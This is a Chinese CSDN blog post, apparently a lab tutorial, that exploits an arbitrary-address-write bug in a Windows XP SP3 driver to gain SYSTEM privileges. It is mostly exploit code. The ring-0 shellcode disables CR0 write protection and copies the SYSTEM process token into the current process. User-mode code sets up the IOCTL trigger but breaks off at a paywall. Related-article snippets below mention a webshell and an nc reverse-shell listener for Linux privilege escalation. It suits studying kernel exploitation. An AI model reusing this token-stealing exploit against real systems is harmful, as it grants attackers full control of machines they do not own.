内核提权,任意地址写任意数据/固定数据模型

最新推荐文章于 2023-07-11 16:07:43 发布
最新推荐文章于 2023-07-11 16:07:43 发布
阅读量4.8k 收藏 5
点赞数
分类专栏: 驱动学习 文章标签: 内核漏洞模型 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuhuibeishadiao/article/details/51401473
版权
本文通过实验环境XP SP3展示了如何利用内核漏洞进行提权。通过将内核函数设为0,然后在用户模式(R3)中获取0地址指针并拷贝shellcode,绕过 ProbeForRead/Write 检查,导致任意地址写入。修复方案涉及异常处理块和 ProbeForRead/Write 的使用。
摘要由CSDN通过智能技术生成

实验环境 xp sp3

此实验将一个不常用的内核函数置0,然后R3申请了0地址的指针,将shellcode拷到此内存,内核并没有做ProbeForRead /Write检查

直接对传入的数据进行了修改,造成了任意地址写任意数据漏洞 ,提权了R3程序为system权限


R3代码

主要获得一个函数的地址,将函数地址传入R0 

R0将此函数地址置0,然后R3申请了一个0地址,将shellcode拷到了申请的内存中,然后调用被置0的函数,触发了shellcode

// exploit.cpp : Defines the entry point for the console application.
//

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "ntapi.h"
#include <conio.h>  
#pragma comment(linker,"/defaultlib:ntdll.lib")  

#define PAGE_SIZE 0x1000
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003
#define KERNEL_NAME_LENGTH 0x0D
#define BUFFER_LENGTH 0x04

//触发漏洞使用的IoControlCode
#define IOCTL_METHOD_NEITHER 0x8888A003
 
int g_uCr0 = 0;
int g_isRing0ShellcodeCalled = 0;

//Ring0中执行的Shellcode 
NTSTATUS Ring0ShellCode(    
						ULONG InformationClass,
						ULONG BufferSize,
						PVOID Buffer,
						PULONG ReturnedLength)
{
	//打开内核写
	__asm
	{
		cli;
		mov eax, cr0;
		mov g_uCr0,eax; 
		and eax,0xFFFEFFFF; 
		mov cr0, eax; 
	}
	//USEFULL FOR XP SP3
	__asm
	{
		//KPCR 
		//由于Windows需要支持多个CPU, 因此Windows内核中为此定义了一套以处理器控制区(Processor Control Region)
		//即KPCR为枢纽的数据结构, 使每个CPU都有个KPCR. 其中KPCR这个结构中有一个域KPRCB(Kernel Processor Control Block)结构, 
		//这个结构扩展了KPCR. 这两个结构用来保存与线程切换相关的全局信息. 
		//通常fs段寄存器在内核模式下指向KPCR, 用户模式下指向TEB.
		//http://blog.csdn.net/hu3167343/article/details/7612595
		//http://huaidan.org/archives/2081.html
		mov eax, 0xffdff124  //KPCR这个结构是一个相当稳定的结构,我们甚至可以从内存[0FFDFF124h]获取当前线程的ETHREAD指针。
		mov eax,[eax] //PETHREAD
		mov esi,[eax+0x220] //PEPROCESS
		mov eax, esi
searchXp:
		mov eax,[eax+0x88] //NEXT EPROCESS
		sub eax,0x88
		mov edx,[eax+0x84] //PID
		cmp edx,0x4	//SYSTEM PID
		jne searchXp
		mov eax, [eax+0xc8] //SYSTEM TOKEN
		mov [esi+0xc8],eax //CURRENT PROCESS TOKEN
	}
	//关闭内核写
	__asm
	{
		sti;
		mov eax, g_uCr0;
		mov cr0,eax;
	}

	g_isRing0ShellcodeCalled = 1;
	return 0;
}  

//申请内存的函数
PVOID MyAllocateMemory(IN ULONG Length)
{
	NTSTATUS NtStatus;
	PVOID BaseAddress = NULL;
	NtStatus = NtAllocateVirtualMemory(
		NtCurrentProcess(),
		&BaseAddress,
		0,
		&Length,
		MEM_RESERVE |
		MEM_COMMIT,
		PAGE_READWRITE);
	if(NtStatus == STATUS_SUCCESS)
	{
		RtlZeroMemory(BaseAddress, Length);
		return BaseAddress;
	}
	return NULL;
}

//释放内存的函数
VOID MyFreeMemory(IN PVOID BaseAddress)
{
	NTSTATUS NtStatus;
	ULONG FreeSize = 0;
	NtStatus = NtFreeVirtualMemory(
		NtCurrentProcess(),
		&BaseAddress,
		&FreeSize,
		MEM_RELEASE);
}

//main函数
int main(int argc, char* argv[])
{
	NTSTATUS NtStatus;
	HANDLE DeviceHandle=NULL;
	ULONG ReturnLength = 0;
	ULONG ImageBase;
	PVOID MappedBase=NULL;
	UCHAR ImageName[KERNEL_NAME_LENGTH];
	ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;
	PVOID HalDispatchTable;
	PVOID xHalQuerySystemInformation;
	ULONG ShellCodeSize = PAGE_SIZE;
	PVOID ShellCodeAddress;
	PVOID BaseAddress = NULL;
	UNICODE_STRING DeviceName;
	UNICODE_STRING DllName;
	ANSI_STRING ProcedureName;
	OBJECT_ATTRIBUTES ObjectAttributes;
	IO_STATUS_BLOCK IoStatusBlock;
	SYSTEM_MODULE_INFORMATION *ModuleInformation = NULL;
	LARGE_INTEGER Interval;
	ULONG InputData=0;

	//清空控制台屏幕
	system("cls");

	//printf("Please press any key to exploit");
	//getch();
	//从line 139-->line 214都是在获取内核函数xHalQuerySystemInformation的内存地址
	//获取内核模块列表数据长度到ReturnLength
	NtStatus = NtQuerySystemInformation(
		SystemModule
最低0.47元/天 解锁文章
zhuhuibeishadiao
关注
专栏目录
【手数据内核组件】0104双向循环链表,麻雀虽小也需要精心设计,整体分层抽象,遍历的多种形式
一个追逐梦想的码农
09-06 705
前文介绍了单向链表,它结构简单易用,但是需要对数据经常随机插入和删除的场景,就显得非常麻烦,需要遍历找到前驱节点。 今天来分享一下双向循环链表,每个节点有前继与后继指针,同时它链表的头和尾也是相连的,这样就可以在任意位置开始遍历。 本文就来介绍双向循环链表有那些操作,来设计一个通用的双向循环链表组件。
linux内核提权
游魂的博客
01-27 2704
记一次linux内核提权 首先要得到一个webshell传个大马上去。 看到这里我已经传进去一个ma.php的大马,现在去访问它! 找到linux提权,开启kali系统,用nc弹个shell回来。 进入kali系统,输入nv -lvvp 12666等待连接。 输入kali系统的ip和端口。 点击开始链接后返回kali系统查看。 可以看到shell已经弹回来了,权限是www-data比较低的...
某软件驱动任意地址任意数据漏洞
深度技术安全
11-17 1178
感觉现在这种漏洞比较突出。METHOD_NEITHER的输出buf为什么长度为0的时候要开发者自己去检查buf长度合不合理。 虽然没去看windows源码,但是,个人感觉一个正常的用户有两种情况: 1、buf长度为0,对应的驱动例程确实也没有输出 2、buf长度不为0,对应的驱动例程确实有输出。 当一个恶意的ring 3程序,朝2发DeviceIoControl(。。。,OutputBu
HEVD-第三部分-任意地址
qq_36918532的博客
03-04 295
驱动分析 首先仍然是打开IDA分析, 任意函数 首先计算IO_CODE #define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802) hex((0x00000022 << 16) | (0x00000000 << 14) | (0x802 << 2) | 0x00000003) = 0x22200b 由第二部分已经知道了 LINK_NAME = L\DosDevices\H
利用格式化字符串漏洞实现任意地址
个人笔记
06-01 3965
理解格式化字符串漏洞关键还是在于理解栈空间布局,任意地址初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
内核提权姿势笔记
09-30 284
方法一: 通过寻找进程的thread_info结构,搜索匹配进程的cred结构,并修改其值获得root权限。thread_info(arch arm)结构如下: /* Linux/arch/arm/include/asm/thread_info.h*/ 20 #define THREAD_SIZE (PAGE_SIZE << THREAD_SIZE_ORDER)...
针对Linux内核提权攻击防御方法的研究.pdf
09-06
提权攻击是指攻击者利用系统漏洞,将用户态的权限提升至内核权限,从而能够执行任意代码,对系统造成严重威胁。文章重点介绍了现有的防御策略,包括SMEP(Supervisor Mode Execution Prevention)机制,以及ASLR...
Linux提权扫描脚本
最新发布
04-28
提权扫描脚本需要对Linux系统有深入理解,包括但不限于文件系统、权限模型、进程管理、网络通信等方面。以下是一些基本步骤: 1. **确定目标**:明确要检测的提权漏洞类型,如SUID/SGID、权限配置错误等。 2. ...
用于电子物理系统的无线传感器网络基于内核机器的安全数据传感和融合方案
03-20
在无线传感器网络,KRLS可以利用历史数据来优化预测模型,减少因数据冗余传输带来的能耗,同时提高数据融合的准确性。 最后,Blowfish算法是一种对称密钥加密算法,由Bruce Schneier发明。Blowfish算法拥有灵活的...
linux内核启动地址修改
08-11
介绍如何修改linux内核的启动地址,比如zreladdr-y := 0x80008000;是描述ti的DM368的,但对普通linux也一样有效。
Linux:内核提权
Elite的博客
07-11 532
内核提权是指通过利用操作系统内核漏洞或错误来获得超级用户权限或系统特权的行为
windows内核提权
weixin_30399055的博客
08-09 219
Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malicious code in order to abuse a system. From the other side patching systems sufficiently is ...
本地内核提权
一只web狗
07-01 1852
本地内核提权
Windows原理深入学习系列-Windows内核提权
SecSource_Stars的博客
03-15 525
这是[信安成长计划]的第 22 篇文章 0x00 目录 0x01 介绍 0x02 替换 Token 0x03 编辑 ACL 0x04 修改 Privileges 0x05 参考文章 继续纠正网上文章那些奇怪的情况和问题 0x01 介绍 虽然主题是 Windows 内核提权,但实际上还是对之前文章的一个总结,这篇文章所用到的东西全都是前几篇文章所提到的知识点,所有的操作都是之前文章所讲述过的,以下所有的实验都是在 Win10_x64_20H2 上进行的。 0x02 替换 Token 主要原理就是将 Sy
任意地址漏洞的一次分析
qq_37936147的博客
07-02 1184
任意地址漏洞的一次分析概述漏洞分析漏洞利用 概述 漏洞文件是termdd.sys,该漏洞会造成对任意地址操作(不是CVE-2019-0708),从Windows xp 到目前的最新版 Windows 10都存在该漏洞,在网上并未查到与之相关信息,也无法确定是否是已知CVE。这个漏洞触发与ms11-011类似,都是在使用RtlQueryRegistryValues函数时枚举指定的注册表键值时造...
操作系统权限提升(十八)之Linux提权-内核提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 2879
内核提权是利用Linux内核漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获到系统内核信息及版本信息;2、根据内核版本获其对应的漏洞以及EXP3、使用找到的EXP对目标系统发起攻击,完成提权操作EXP该怎么着呢,可以用Kali去寻找,kali自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞输入就会自动复制该文件到当前目录。
Windows提权笔记-内核提权
墨痕诉清风的博客
03-12 125
利用内核或第三方驱动漏洞时,可能造成蓝屏,因此应小心调查系统、版本、架构等信息1. 检查系统版本、架构2. 枚举系统驱动3. 搜索已知漏洞4. 查询USBPcap版本5. 编译漏洞利用代码Mingw-64 既 Windows 版本GCC,可以编译32/64位程序下载Mingw-64,解压设置系统环境变量PATH6. 编译 exp 代码,并执行提权成为 systemexploit。
Linux权限
niqiu320的博客
05-24 1044
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值